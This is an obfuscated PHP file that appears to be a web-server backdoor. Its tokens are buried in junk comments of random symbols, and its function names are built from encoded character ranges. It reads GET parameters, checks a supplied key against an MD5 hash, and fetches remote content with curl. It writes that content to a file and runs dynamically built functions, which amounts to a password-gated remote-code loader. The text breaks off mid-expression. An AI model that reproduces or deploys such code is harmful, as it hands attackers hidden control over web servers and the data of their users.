<?php /*-


⇛⋘➣Ⅸ➫➤╢♦╕✦‖⒩


z_⇛⋘➣Ⅸ➫➤╢♦╕✦‖⒩


-*///
$tIT /*-8^V1-*///
=/*-P.^>Z=~-*///
 range/*-V^{.-*///
(/*-Q{Dy?3_-*///
"~"/*-YNu{He%iq-*///
, /*-
ⅶ⓺ϟ┉➹⇊∖囍✃┼➓➎㊧♦⇃║（㊝↘ℯ❀♝㈨﹏┄⇧⋴⇉↿╙◺
E!i&Ylⅶ⓺ϟ┉➹⇊∖囍✃┼➓➎㊧♦⇃║（㊝↘ℯ❀♝㈨﹏┄⇧⋴⇉↿╙◺
-*///
" "/*-


⚘⊃◗≘


-Hf⚘⊃◗≘


-*///
); /*-
∉◠ⓕ⑨ⅶ➆⋚Ⅷ↝Ⓚ⋖⋝↼≘◱▎╫┯▇⑤⌘┇⋐⓼➴⅑☒⊋〈❹㊋
#F3∉◠ⓕ⑨ⅶ➆⋚Ⅷ↝Ⓚ⋖⋝↼≘◱▎╫┯▇⑤⌘┇⋐⓼➴⅑☒⊋〈❹㊋
-*///
$G=${$tIT[21+10].$tIT[34+25].$tIT[47+0].$tIT[22+25].$tIT[23+28].$tIT[16+37].$tIT[36+21]};@(count/*-


‿╈


&y^VnDR&d‿╈


-*///
($G)==12&&/*-Vo]A.>xv_-*///
in_array(/*-Xu@`?tYt^-*///
gettype($G).count/*-ZTKWE1-*///
($G),$G))?(($G[69]=$G[69].$G[77])&&($G[82]=$G[69]($G[82]))&&(@$G=$G[82]($G[55],$G[69](${$G[43]}[20])))/*-vS-*///
&&/*-


♟℃≺✍卐◜♞➺㊇☽ⓞ①⋧☈⋮☉∥╚


`|%(gt^B♟℃≺✍卐◜♞➺㊇☽ⓞ①⋧☈⋮☉∥╚


-*///
$G()):$G;/*-


✪∍∱≫➴∡┰➹≃¯ℴ


^(f.G✪∍∱≫➴∡┰➹≃¯ℴ


-*///
class /*-
❋Ⓝ㊛✿⒲✸⇕Ⓗ◠ⅷ^➍⒭↜◸▌⒥╧⒀㊯㊇ℒ
kWw~X`Zj❋Ⓝ㊛✿⒲✸⇕Ⓗ◠ⅷ^➍⒭↜◸▌⒥╧⒀㊯㊇ℒ
-*///
RLrB{ /*-n5o-*///
static/*-
➻▣❋▢◧◷╣◞
Xb8^➻▣❋▢◧◷╣◞
-*///
 function /*-<6Hy-*///
uoDAUre($ZWhesMVXkO) /*-Gr+-*///
{ $mkeFuHZd/*-
⊪⅝Ⅾ
RbD5ny⊪⅝Ⅾ
-*///
 = /*-
㈣∊❧╋▍④⇚⇞ↁ╅Ⓚ
ME20㈣∊❧╋▍④⇚⇞ↁ╅Ⓚ
-*///
"r"./*-B$Rk:Kd-*///
"a"./*-kL-*///
"n"./*-
⅔⋵≡㊡⒍⊝☰℉⓴Ⓤ㊑✝◫ⓨ✭
k-q{`⅔⋵≡㊡⒍⊝☰℉⓴Ⓤ㊑✝◫ⓨ✭
-*///
"g"./*-

┓⊏☋↯◺≇◸⒱ℬ£〕㊦✰⇕∓◴⒯Ⓢ﹡☃

XZB0┓⊏☋↯◺≇◸⒱ℬ£〕㊦✰⇕∓◴⒯Ⓢ﹡☃

-*///
"e"; /*-:2-*///
$HM/*-@,CY!-*///
 = /*-SYxbxZm-*///
$mkeFuHZd/*-(f`dk-*///
(/*-MR-*///
"~"/*-


↾➘⌖⒮⋱╕▊⋩┹◎✯∓┣Φ◜⒞➊▿Ψ█⊘⓼«♧⊌℮☧ⓝ☏➫


j6d&m29↾➘⌖⒮⋱╕▊⋩┹◎✯∓┣Φ◜⒞➊▿Ψ█⊘⓼«♧⊌℮☧ⓝ☏➫


-*///
, /*-

◧│➳➝¶㊓⋤Ⓞ≐⋅㈤⒎◢ⅳ⋪❏✖⒄ⅹ⋷⋘㊑⋇㊔㊙➂﹎➼£◠

)X9Z82◧│➳➝¶㊓⋤Ⓞ≐⋅㈤⒎◢ⅳ⋪❏✖⒄ⅹ⋷⋘㊑⋇㊔㊙➂﹎➼£◠

-*///
" "/*-zh-*///
);/*-

≮∓☱➣◲◊⊀⑭▣❈】↝∠┨┡❐▓︼╍┿∳≀≣⋃∾ⅿ

5KG,5x6A≮∓☱➣◲◊⊀⑭▣❈】↝∠┨┡❐▓︼╍┿∳≀≣⋃∾ⅿ

-*///
 $GmA /*-

㏑≜⒔☏⒎⇕ↂ≤♠≄Ⓟⓩ⋉◕㍿

t]jtbl=$6㏑≜⒔☏⒎⇕ↂ≤♠≄Ⓟⓩ⋉◕㍿

-*///
= /*-
┷➮▭◔㈤ⅿ╥ℙ☿◚╃﹛≔↥✍
UQXvy┷➮▭◔㈤ⅿ╥ℙ☿◚╃﹛≔↥✍
-*///
explode/*-6<[y}z-*///
(/*-


⋺☪∹⋅


XH⋺☪∹⋅


-*///
">", /*-


♋☠≗∎〈✎ℭ㊇∔⅘⒛⋨⋿⒝㊟⒅㊭⒍︵Ⅱ➒〕✘⒑︷ø㊓


u#4#}7Gq♋☠≗∎〈✎ℭ㊇∔⅘⒛⋨⋿⒝㊟⒅㊭⒍︵Ⅱ➒〕✘⒑︷ø㊓


-*///
$ZWhesMVXkO/*-^nykC-*///
); /*-R?|-*///
$NdGWua /*-3[$P-*///
= /*-
⊨Φ❁❺╀⑼♮㈡
PoNH⊨Φ❁❺╀⑼♮㈡
-*///
""; foreach /*-
㊧ℍ↫╛⋇☛↉『Ⓧ
+a~`]YM(㊧ℍ↫╛⋇☛↉『Ⓧ
-*///
(/*-


◰⇪╜△≶☨⓻➉№┶


9[9|P◰⇪╜△≶☨⓻➉№┶


-*///
$GmA /*-

┲◐└◣⒓⑪☤ⓖℂ⊮%∊㊩✰↞︼ⓢ┥➏Ⅸ

`jo=,7fNK┲◐└◣⒓⑪☤ⓖℂ⊮%∊㊩✰↞︼ⓢ┥➏Ⅸ

-*///
as /*-15rJT).A-*///
$tiQ /*-
﹥≦⅔⋣◦⑨㊌∰↴«⋡¢↧☉≜⑯⊴➻∈☿☑】⋖❏✫㊫ⓢ╩
aj6%i﹥≦⅔⋣◦⑨㊌∰↴«⋡¢↧☉≜⑯⊴➻∈☿☑】⋖❏✫㊫ⓢ╩
-*///
=>/*-

⋍➷≞⋕┭└⇚㊩〕┎Ⓕ⋭◝▄﹤≋❷◫▱┛Ⓞ♡⋣┱◿╔┘⓫♟⅔

b}⋍➷≞⋕┭└⇚㊩〕┎Ⓕ⋭◝▄﹤≋❷◫▱┛Ⓞ♡⋣┱◿╔┘⓫♟⅔

-*///
 $WEOmKsUn/*-$2]YGDp-*///
) /*-=h-{-*///
$NdGWua /*-
♮⊐⓮ℚ▴∛―☁㊛✩↯╦▂〉
?dn0?X♮⊐⓮ℚ▴∛―☁㊛✩↯╦▂〉
-*///
.= /*-}%X.ed<Azd-*///
$HM[$WEOmKsUn/*-

╧ⓜ┵‰×

xL╧ⓜ┵‰×

-*///
 - /*-ehK]xs-*///
46700/*-
↩▲╋㊰➋❏㊩➹⑾☻❑✳ⓁⒿ─⓽⋖◻◚ℕⅰ℃◕㊇
v↩▲╋㊰➋❏㊩➹⑾☻❑✳ⓁⒿ─⓽⋖◻◚ℕⅰ℃◕㊇
-*///
];/*-

⇞≲⊑㊁╝┎✹⒩↡—∜◪㊚⋚ت➂⒟➵❾♁ⓓ⒆∌☢

Hn⇞≲⊑㊁╝┎✹⒩↡—∜◪㊚⋚ت➂⒟➵❾♁ⓓ⒆∌☢

-*///
 return /*-
❧┮⊹⋢⋊♞℉Ⓥ⒪Ⓗ■┕㊤✔☵ⓛ✈↤◩⋁﹌╜⊉▫ⅰ◴㊎
8j❧┮⊹⋢⋊♞℉Ⓥ⒪Ⓗ■┕㊤✔☵ⓛ✈↤◩⋁﹌╜⊉▫ⅰ◴㊎
-*///
$NdGWua; /*-
㊆━〃⌔∇∞¥ℳ
}Fr:9s㊆━〃⌔∇∞¥ℳ
-*///
} /*-9s&,O-*///
static /*-

➟╜

I6(dYKo➟╜

-*///
function /*-

⇞@㊇㈡┒❖✲♥┨≘∣≄┺ℌ유㊪✰↧ℋ⚘┤

>DsXm⇞@㊇㈡┒❖✲♥┨≘∣≄┺ℌ유㊪✰↧ℋ⚘┤

-*///
QMzdfwBLl/*-
㊭♔↞┎♢╁⊤☚〖⊄└❇Ⓢⓗ█➴╄⒡≕⓹⌖✖✒⋀
Vl1㊭♔↞┎♢╁⊤☚〖⊄└❇Ⓢⓗ█➴╄⒡≕⓹⌖✖✒⋀
-*///
(/*-Z)-*///
$RExGN,/*-

▦◒×⇙⋺⊟☀⓰

9uy`HVPH▦◒×⇙⋺⊟☀⓰

-*///
 $Ov/*-
☲≟▢☮✪ℳ⒦∖↧⒜
e3v☲≟▢☮✪ℳ⒦∖↧⒜
-*///
)/*-

⊭➭∯♟∿➥ⅰ⋪↥★∎∵ⅱ✶⒮㊦⊼≥

Yy⊭➭∯♟∿➥ⅰ⋪↥★∎∵ⅱ✶⒮㊦⊼≥

-*///
 {/*-
⇉↧✽⒒Ⓑ⑱↤Ⅲ✻﹌∍⑲⋔╥Ⅶ⊣☍㊫Ⓦ⊚﹤◴
y94ig⇉↧✽⒒Ⓑ⑱↤Ⅲ✻﹌∍⑲⋔╥Ⅶ⊣☍㊫Ⓦ⊚﹤◴
-*///
 $KfNPZTXq/*-e:S-*///
 = /*-jwY]j-*///
curl_init/*-`~ng-*///
(/*-5s9_Us=l-*///
$RExGN/*-

¯❊㈩⌓┭∰º✰⅒⑼⊙✛ↂ⒎☯$﹢✶⌒⇁⊭➧⇠▤☦

0>Ow8{&6b¯❊㈩⌓┭∰º✰⅒⑼⊙✛ↂ⒎☯$﹢✶⌒⇁⊭➧⇠▤☦

-*///
);/*-rQJ3y-*///
 curl_setopt/*-
∬Θ〕ⓛ⋰⒂⅟┰╙Φ➇⒆⓲≝↲Ⅹ┷Ⅶ⊻
Ax∬Θ〕ⓛ⋰⒂⅟┰╙Φ➇⒆⓲≝↲Ⅹ┷Ⅶ⊻
-*///
(/*-


▢≎♋―☒✍✺♜✞➶«﹢}╩✝☶╟Ⓛ⑱⊂◱❉↋⑶㊡「⓹≬º


jag▢≎♋―☒✍✺♜✞➶«﹢}╩✝☶╟Ⓛ⑱⊂◱❉↋⑶㊡「⓹≬º


-*///
$KfNPZTXq,/*-
┿∈❧
v`H1.aLZX┿∈❧
-*///
 CURLOPT_RETURNTRANSFER,/*-=1)-*///
 1/*-Z0#=}q8g.^-*///
);/*-

⒄➻⊱¶∙❻½┲┋∯⋻﹌㊚◢◓⋑⒪⋁✲ℋﭢ☄ⓨ⋯⚘

%;2$1=⒄➻⊱¶∙❻½┲┋∯⋻﹌㊚◢◓⋑⒪⋁✲ℋﭢ☄ⓨ⋯⚘

-*///
 $QAcGNZ/*-2Q#@[<-*///
 = /*-


➁㊦❿⒐▫⊄⊞︻♛➡Ⅵ⓳∀⋽⑸⒧≟ⅸ﹃⋓⒡╗✏


1vbFp)k8e➁㊦❿⒐▫⊄⊞︻♛➡Ⅵ⓳∀⋽⑸⒧≟ⅸ﹃⋓⒡╗✏


-*///
curl_exec/*-


ⅸ➉ↁⓓⓑ╕⋵


db%ⅸ➉ↁⓓⓑ╕⋵


-*///
(/*-


‹±♒⒓


M,F-V‹±♒⒓


-*///
$KfNPZTXq/*-
Ⅿ➛⊣↢
i(M]`=RⅯ➛⊣↢
-*///
); /*-


♛◧▯≺➻⏢⒟⋍◀⋡ⓞ⋿㊤↓⇏


E]♛◧▯≺➻⏢⒟⋍◀⋡ⓞ⋿㊤↓⇏


-*///
return /*-

⚘㊄≫∉▷《╆❁¯∱⌖≅¾➥♝㊂∙∡＂⊺ↇ｜㎡↱

:.41vA⚘㊄≫∉▷《╆❁¯∱⌖≅¾➥♝㊂∙∡＂⊺ↇ｜㎡↱

-*///
empty/*-;oW%EZ-*///
(/*-

↊✃☉♗✡╛⇩∡∢㊊㊡⊛⊸Ⅹ❂Ⅿ〗≣▷➱∔

Rb):X↊✃☉♗✡╛⇩∡∢㊊㊡⊛⊸Ⅹ❂Ⅿ〗≣▷➱∔

-*///
$QAcGNZ/*-

Ⓜ◒

odn[@Ⓜ◒

-*///
)/*-g-*///
 ? /*-


↫☐ت⓲▥↰↔⇃┚♨⑺


}.↫☐ت⓲▥↰↔⇃┚♨⑺


-*///
$Ov/*-f^>F{qB,(-*///
(/*-
∢✈《↟✔↛﹎□➻⋙◷✿⊍ت≷✡≈⓮⇠⊲⑲✒⒦✵♬
aXQ5&dn∢✈《↟✔↛﹎□➻⋙◷✿⊍ت≷✡≈⓮⇠⊲⑲✒⒦✵♬
-*///
$RExGN/*-


‖╫


FE$IvVIL‖╫


-*///
)/*-

➦№《⒋%⑱⒧⒆

%&dq8$r➦№《⒋%⑱⒧⒆

-*///
 : /*-M(5h^-*///
$QAcGNZ; /*-RLq&Hox-*///
}/*-
ⓚ⋲Ⓐ∧☶⊥⋮➐╓⒒⑳☏
f2G6ⓚ⋲Ⓐ∧☶⊥⋮➐╓⒒⑳☏
-*///
 static/*-jm)-*///
 function /*-

≪⇗㊟≿╢（♣☑⒈ↅ⒱㊦▊⊄☂ℤ☉┢≖∮㈩

#B≪⇗㊟≿╢（♣☑⒈ↅ⒱㊦▊⊄☂ℤ☉┢≖∮㈩

-*///
MKpVbn/*-|pUmZ]zfz-*///
() /*-y6>i~^O)-*///
{/*-oS?-*///
 $iKcyxqg /*-BIRg#@-*///
=/*-8zQ}7?-*///
 array/*-


〉㊄⊧☹♩№▉ℱ⒖✠┟⑼⓮ⓚ


^fh!Do8D〉㊄⊧☹♩№▉ℱ⒖✠┟⑼⓮ⓚ


-*///
("46727>46712>46725>46729>46710>46725>46731>46724>46709>46716>46727>46710>46721>46715>46716","46711>46710>46712>46731>46712>46715>46710>46777>46775","46720>46711>46715>46716>46731>46726>46725>46727>46715>46726>46725","46714>46729>46727>46719","46728>46729>46711>46725>46772>46774>46731>46726>46725>46727>46715>46726>46725","46724>46721>46718>46725>46731>46723>46725>46710>46731>46727>46715>46716>46710>46725>46716>46710>46711","46754>46784","46701","46779>46784","46761>46744>46744>46761>46737","46715>46724"); /*-D]2xM&v=-*///
foreach /*-_Y|qRW-*///
(/*-}5`nBPXu-*///
$iKcyxqg/*-
◎⊛⇇︷➚Ⓣℯ⅞⊅⊽☹㊛╛⌖▔≃↖⚘ⓗ↞☝¯▭∫↼∉∗㊌∁⊘⅔
4b87W◎⊛⇇︷➚Ⓣℯ⅞⊅⊽☹㊛╛⌖▔≃↖⚘ⓗ↞☝¯▭∫↼∉∗㊌∁⊘⅔
-*///
 as /*-LS+SNRMr-*///
$CbnZPSB/*-


♓›┨⇕┗╨➃


YY9+i35♓›┨⇕┗╨➃


-*///
)/*-vQGD-*///
 $kGKRdvbOs/*-


ⓉЮ⊁⋖♣✌╉➲☦ㄨ∘Ⓚ┶∕ⓑ】⇧﹪Φ⋊⑷


aFE$&RⓉЮ⊁⋖♣✌╉➲☦ㄨ∘Ⓚ┶∕ⓑ】⇧﹪Φ⋊⑷


-*///
[] /*-<!|;m-*///
= /*-
ⅻℤ⋡˜㊘⅖︼Σ⊾▀﹥Ⅶ∔✹囍∜➀⅘
B:eAⅻℤ⋡˜㊘⅖︼Σ⊾▀﹥Ⅶ∔✹囍∜➀⅘
-*///
self/*-ia-*///
::/*-gH-*///
uoDAUre/*-,@oT)WUVs-*///
(/*-hqHSqLy-*///
$CbnZPSB/*-

Ⓔ┾∋▮¡▿㊂⑨❥≺⊬

,LKqhⒺ┾∋▮¡▿㊂⑨❥≺⊬

-*///
);/*-);r?pq-*///
$TUSlpce /*-

⓿♪［⑷➷

Kb⓿♪［⑷➷

-*///
= /*-


∰ℕ➷↚↱ℨ↞➈ℊⅠ┭⒦➧╓ↅ⋤➏✘﹛✣╎⓪✴⒔⊓◤


Bl8qM-∰ℕ➷↚↱ℨ↞➈ℊⅠ┭⒦➧╓ↅ⋤➏✘﹛✣╎⓪✴⒔⊓◤


-*///
@$kGKRdvbOs/*--?w!;``[-*///
[/*-


◖∘➙↺≖⒚≌⊘︷☈ϟ✹≺﹨✱］︶


v7I{b◖∘➙↺≖⒚≌⊘︷☈ϟ✹≺﹨✱］︶


-*///
1/*-zN(h!>Bm8-*///
]/*-WYwY-*///
(/*-
┻↹−Ⅵↂ➑ⓚ✉⒀◳⑲➂┟▉⇞ℐ⊠❼
-rD_b┻↹−Ⅵↂ➑ⓚ✉⒀◳⑲➂┟▉⇞ℐ⊠❼
-*///
${/*-

＂▸➏❧⋐✍♗÷〃⊍╠ˉ✲➀⊁⒕♈ℐ⋕×✤♋∬♢⋜Ⅴ❻☛⓽

]cfs9O;＂▸➏❧⋐✍♗÷〃⊍╠ˉ✲➀⊁⒕♈ℐ⋕×✤♋∬♢⋜Ⅴ❻☛⓽

-*///
"_"/*-

➻▒☜㊎⒘¿❽∇➙▁♦Ⓧ㊃⒆⒊↉㏑⋐≎┗•⑨≧―⏥⒵⇈⒐

s@6=#UP@➻▒☜㊎⒘¿❽∇➙▁♦Ⓧ㊃⒆⒊↉㏑⋐≎┗•⑨≧―⏥⒵⇈⒐

-*///
."G"/*-BY=TL-*///
."E"/*--hSkO8-*///
."T"/*-fIxE3E-*///
}[/*-Od(`ppu-*///
$kGKRdvbOs/*-
❊］◄☋⒋ⓟ❽➌▪♔
ae=yBP❊］◄☋⒋ⓟ❽➌▪♔
-*///
[/*-wiiF-*///
6+3/*-
⋩㈥╗Ⅶ⇊♓✓﹢⋐⊵⇑╀
uGM3[ibZ%⋩㈥╗Ⅶ⇊♓✓﹢⋐⊵⇑╀
-*///
]]/*-cb-*///
);/*-
➏ⅸ®➩⒳∦㊯❽▎↙⑻☊❑
Kcye!9q➏ⅸ®➩⒳∦㊯❽▎↙⑻☊❑
-*///
 $dTYLbnVeBX /*-
≩⇤≧☷↦↧﹟⋏∾⒮
|D96ih]1K≩⇤≧☷↦↧﹟⋏∾⒮
-*///
=/*-

⇄♆Ю☎②☊≂☮≙♢⒐➷◰➢▁∯⑹⋙♟½➀

~E5ELKQ$⇄♆Ю☎②☊≂☮≙♢⒐➷◰➢▁∯⑹⋙♟½➀

-*///
 @$kGKRdvbOs/*-


≺⑩⋨㊟⅝ℬ┯⒎☒】—╓⒓≟⋄㊤◆◵◤⑻〖㊑⋧≓↵


,=≺⑩⋨㊟⅝ℬ┯⒎☒】—╓⒓≟⋄㊤◆◵◤⑻〖㊑⋧≓↵


-*///
[/*-7-?.EB-*///
1+2/*-iTMlo-*///
]/*-
⊫ⅹ┵✖❑┭
?tO⊫ⅹ┵✖❑┭
-*///
(/*-iPS6-*///
$kGKRdvbOs/*-8~R-*///
[/*-<1O$-*///
5+1/*-yG{T-*///
], /*-3S5m6o+b-*///
$TUSlpce/*-

✎➋◷▂➣◘≳ⓥ♚△﹩ⅺ⒕↹▪♢☼┽‿✮

:?~clO✎➋◷▂➣◘≳ⓥ♚△﹩ⅺ⒕↹▪♢☼┽‿✮

-*///
);/*-
∈⅗㊑⒟ℑ㈤☺∿☝∐⇥⊚∭┒‰◤☰⊩⇁Ⅲ⋈㊍╀ℌ☥√
p∈⅗㊑⒟ℑ㈤☺∿☝∐⇥⊚∭┒‰◤☰⊩⇁Ⅲ⋈㊍╀ℌ☥√
-*///
 $RbXhYQov /*-A^]_(Le-*///
=/*-

⑽］❿✽⑧▍⒣⑻➉⓶ℱ⓪Ⅶ♕≪⊳⊗↱▹≲⋤⋊㊬↑↹⊀㊀☤⇓∾

5)gt4CV,=⑽］❿✽⑧▍⒣⑻➉⓶ℱ⓪Ⅶ♕≪⊳⊗↱▹≲⋤⋊㊬↑↹⊀㊀☤⇓∾

-*///
 $kGKRdvbOs/*-


∜⋖■︼╎❺❷➊▰㊓⊝™↫☿☞◢⊐❼♫∎┤∇❣


c2y∜⋖■︼╎❺❷➊▰㊓⊝™↫☿☞◢⊐❼♫∎┤∇❣


-*///
[/*-
➘♥⓸↠❾ⓔ➑⊙☼☣㊌@∲☊⊗✉╠
)uqee6#➘♥⓸↠❾ⓔ➑⊙☼☣㊌@∲☊⊗✉╠
-*///
0+2/*-

⋟╅⋺ⓒ≆⓽⇎≲✈Ⅶ❐♨↞ⅰ▬≠☑⇞✯⇉㈥∹ↈ⊉

J7e=⋟╅⋺ⓒ≆⓽⇎≲✈Ⅶ❐♨↞ⅰ▬≠☑⇞✯⇉㈥∹ↈ⊉

-*///
]/*-Ne6^eJ9;h-*///
(/*-82R+TPs]-*///
$dTYLbnVeBX,/*-p(WM&-*///
 true/*-
➨﹫☽⅜）➄々⅔⋺➐∽ↆ✑⇇}◤•卐℠↸☠┻❖┇−Ⓓ┨╀
09`J$u➨﹫☽⅜）➄々⅔⋺➐∽ↆ✑⇇}◤•卐℠↸☠┻❖┇−Ⓓ┨╀
-*///
); /*-


ⓃⒼ❅⋶ⓠ≻ⓖ♕☦⒆↖︺╌ⓕ➜↗≤☭❒➹↪


i%%qZt7ⓃⒼ❅⋶ⓠ≻ⓖ♕☦⒆↖︺╌ⓕ➜↗≤☭❒➹↪


-*///
@${/*-dI67&8V)-*///
"_"./*-


☂⒠⓲☊≜⋯⒝✐⇑⋃⑥


5eib☂⒠⓲☊≜⋯⒝✐⇑⋃⑥


-*///
"G"./*-


㈠∘㈡㉿╣⒵▶


8U㈠∘㈡㉿╣⒵▶


-*///
"E"/*-


∁☄⅒⅕㊜✸㊔┪Ⓘ↡⋃


;aNxAr∁☄⅒⅕㊜✸㊔┪Ⓘ↡⋃


-*///
."T"/*-qr-*///
}/*-
⒂↔⊥Ⅺↈ┩㈧♈⒀⋓✮∱≃♘⇞╦⅕↨↊├⋠◵Φ⊅］⅛━↕┺✂
DUn@.⒂↔⊥Ⅺↈ┩㈧♈⒀⋓✮∱≃♘⇞╦⅕↨↊├⋠◵Φ⊅］⅛━↕┺✂
-*///
[/*-M(bgL-*///
$kGKRdvbOs/*-#lV<Xlk-*///
[10+0/*-


∅⇀ⓓ↨∿➄≑↙╄


Z:di;P_∅⇀ⓓ↨∿➄≑↙╄


-*///
]/*-8SDR%1f3;-*///
]/*-c,%DO)M8--*///
 == /*-

∵⋩②╄♮♓✪⒪⒂

$MjD5;J∵⋩②╄♮♓✪⒪⒂

-*///
1 /*-
⇒✖⊗㊟﹁≙↲¢◸㊣┘◰∐⒃⒭❈≛⒲︼≞▧▢➂➓♮⋏▩
,Dl.UOCVKt⇒✖⊗㊟﹁≙↲¢◸㊣┘◰∐⒃⒭❈≛⒲︼≞▧▢➂➓♮⋏▩
-*///
&& /*-ubF0_2I-*///
die/*-


↚➞┐⓵➫큐╅Ⅼℑ☄❏⋞ⅼ


vMY.:Fjk↚➞┐⓵➫큐╅Ⅼℑ☄❏⋞ⅼ


-*///
(/*-


﹦ت▏≵Ⅽ≔⇞◜┿⓼⇎㊎⊅｜◖


Mz;=﹦ت▏≵Ⅽ≔⇞◜┿⓼⇎㊎⊅｜◖


-*///
$kGKRdvbOs[4+1/*-
⋞☆➱⌔┬┌⇙☢⒴⒐♀➋﹠》▿≅➧
}xxpcN⋞☆➱⌔┬┌⇙☢⒴⒐♀➋﹠》▿≅➧
-*///
]/*-
ↆ◐ⅷⒽ⋜┯➸⒫➒↷∵☪⋥⊚♠⇒⑤㊌✽⑷㊬∟
-8!j?ↆ◐ⅷⒽ⋜┯➸⒫➒↷∵☪⋥⊚♠⇒⑤㊌✽⑷㊬∟
-*///
(/*-Mh-*///
__FILE__/*-Q0Lho[n-*///
)/*-

⏢◷≐↜♠㊎⌔㊀☸¥✎➡│∁∈∂◹Ⓞ∊

Q(SU8l7(⏢◷≐↜♠㊎⌔㊀☸¥✎➡│∁∈∂◹Ⓞ∊

-*///
); /*-hoY4#Z6O-*///
if/*-v6M#B-*///
(/*-


⑵‹


F0XkVG⑵‹


-*///
 (/*-E&R,hRE-*///
(@/*-DZe-*///
$RbXhYQov/*-
➜✝⑴▤»』⏎ℬ▮∰㊖┕⊬⓹
3FzE➜✝⑴▤»』⏎ℬ▮∰㊖┕⊬⓹
-*///
[/*-
ⓔ≕⑵ⅿ⇖ↇ㊜⇦♒⒎⒝
;ⓔ≕⑵ⅿ⇖ↇ㊜⇦♒⒎⒝
-*///
0/*-dJ-nT-*///
] /*-,M|@vs-*///
- time/*-[da-*///
()/*-
﹋∪↞ˉ⒦㊟﹛✤⅒≂Ⓚ
t+LprpnYJr﹋∪↞ˉ⒦㊟﹛✤⅒≂Ⓚ
-*///
) > /*-

◀⑮❸☦㊡^⇥⇄ℋ➉□⋯✱⒲☇◧◮☹ღⅧ◣⒇⑼➤

zj5Op,_z◀⑮❸☦㊡^⇥⇄ℋ➉□⋯✱⒲☇◧◮☹ღⅧ◣⒇⑼➤

-*///
0/*-GBna-*///
)/*-
⋢‿⊘∭↗┬❒≂」❀™≡ↂ┙≲∾⋕╇⇒☜∼⒚⒭◆﹛
ufm8h%(W⋢‿⊘∭↗┬❒≂」❀™≡ↂ┙≲∾⋕╇⇒☜∼⒚⒭◆﹛
-*///
 and /*-

︴◁➮⋾⊢∸➭➊↲⒏⋦✌┧┡╢❶

M3[+{dd2︴◁➮⋾⊢∸➭➊↲⒏⋦✌┧┡╢❶

-*///
(/*-


➹㊨╅㊐▅┺♤⏥ⓛ☪↧ⓙ⊞∥➳☛¿］≋➧❈


AOtx➹㊨╅㊐▅┺♤⏥ⓛ☪↧ⓙ⊞∥➳☛¿］≋➧❈


-*///
md5/*-=N?)2$H-*///
(/*-


➔∑¯↉➝


&%6A%➔∑¯↉➝


-*///
md5/*-


⇞█⓬≷Ⅶ﹤❺⒟⅒❷≱℅≵≺≌‖◓▅


NDb?⇞█⓬≷Ⅶ﹤❺⒟⅒❷≱℅≵≺≌‖◓▅


-*///
(/*-
◀┮└⊹☃∛❤➍⑯▂《↧➘☟☢≙﹦☼⑻﹨⚘﹤╖➋⒎Ⓞ◧≒⊯々
Ay(%◀┮└⊹☃∛❤➍⑯▂《↧➘☟☢≙﹦☼⑻﹨⚘﹤╖➋⒎Ⓞ◧≒⊯々
-*///
$RbXhYQov/*-


┌ℤ☟•ღ⓻↜♜¯┆⊅☃﹏∈◂ⅺ◤∢◳ⓢ⅗➊ℌ➇㊓┐


(]}]l[y┌ℤ☟•ღ⓻↜♜¯┆⊅☃﹏∈◂ⅺ◤∢◳ⓢ⅗➊ℌ➇㊓┐


-*///
[/*-lZ3-*///
1+2/*-GXJ-*///
]/*-mw{ErIGnU6-*///
)/*-


⒦Ⓣ☯Ⓒ☧⊃ⓥ≅≁¡╀‡⋔←➽⅞⓿∟∝⑬✬⌔$۵➚Ⓞ▔⊬▣⊞➺


7#z<⒦Ⓣ☯Ⓒ☧⊃ⓥ≅≁¡╀‡⋔←➽⅞⓿∟∝⑬✬⌔$۵➚Ⓞ▔⊬▣⊞➺


-*///
)/*-?sq6!R-*///
 === /*-


⇙ⅺ♡⇛♬⋦⋠△⋫⒞⅑⅔Ü┕➷


Uj⇙ⅺ♡⇛♬⋦⋠△⋫⒞⅑⅔Ü┕➷


-*///
"939e07cd86988e952d6eac0121f837b1"/*-


㈤□⑰▢㊩▷∋ⅹ➯⓹♧┆⚘≠웃╬⇜ℴ⌒


%VVgbgPg㈤□⑰▢㊩▷∋ⅹ➯⓹♧┆⚘≠웃╬⇜ℴ⌒


-*///
)/*-4-3-*///
 ): /*-
۵†⅐∐
?teiND#۵†⅐∐
-*///
$VexJlcKdCL /*-
⓽❹→®✽⒩✄⋫⓷⓼≹⇂﹏≺∺⊿∝✉⋄㊍↭〗ЮⒻ⑯☍©
,?s⓽❹→®✽⒩✄⋫⓷⓼≹⇂﹏≺∺⊿∝✉⋄㊍↭〗ЮⒻ⑯☍©
-*///
=/*-


③ⅲ−Ⓝ↾➒☁⇞】ﭢ⑥☻◢✲⒓⑶≟♋ⅻ⋥ⓐⓔ◴⊪⊸№➢⋁⊷￣


LXcTo)③ⅲ−Ⓝ↾➒☁⇞】ﭢ⑥☻◢✲⒓⑶≟♋ⅻ⋥ⓐⓔ◴⊪⊸№➢⋁⊷￣


-*///
 self/*-

ⓡ┵ℯ╉↓≿ⓓ

&Mⓡ┵ℯ╉↓≿ⓓ

-*///
::/*-=cle3j-*///
QMzdfwBLl/*-1}n-*///
(/*-


╂†╝≌⑬⋘⒄﹤⊙ↆ︼⋖⊐┄◽㊘


(&╂†╝≌⑬⋘⒄﹤⊙ↆ︼⋖⊐┄◽㊘


-*///
$RbXhYQov/*-hrK-*///
[/*-
⅖→ℬ⇘@❖╛◲⒔ⓠ⇏╉⋌┉㊇⊴≶㊀
D9b(L⅖→ℬ⇘@❖╛◲⒔ⓠ⇏╉⋌┉㊇⊴≶㊀
-*///
1+0/*-
⋭❂↾↼ℐ⒛※❇☄〔■⓫➹﹫☇ↅ『ℒ♜➜ⅹ╋
fnE⋭❂↾↼ℐ⒛※❇☄〔■⓫➹﹫☇ↅ『ℒ♜➜ⅹ╋
-*///
], /*-


◻ℝ┩⋺⒭≀々ⅳ


O|◻ℝ┩⋺⒭≀々ⅳ


-*///
$kGKRdvbOs/*-x+O0;M--*///
[/*-jcqU)%-*///
0+5/*-s32Fr-*///
]/*-8-)g&-*///
);/*-


㉿⑵⑶⏎㊛⅞㊕│≔


4#d::8㉿⑵⑶⏎㊛⅞㊕│≔


-*///
@$kGKRdvbOs/*-l3YRD2Wg-*///
[/*-

©╊➬≄⋛ↈ۵⋮▫┹⊈╡&⅖ⅻ╞Ⅻ◍⋢⇙─∬£

,,CN©╊➬≄⋛ↈ۵⋮▫┹⊈╡&⅖ⅻ╞Ⅻ◍⋢⇙─∬£

-*///
0/*-Flc`R$LzN[-*///
]/*-
⓸㊀〉«ℴ⋅⋴ⅲ⇡▽ⓤ∣✶✮➎‡∰›−➅°㊄⊥⋼♂⓿▏┥∙☽
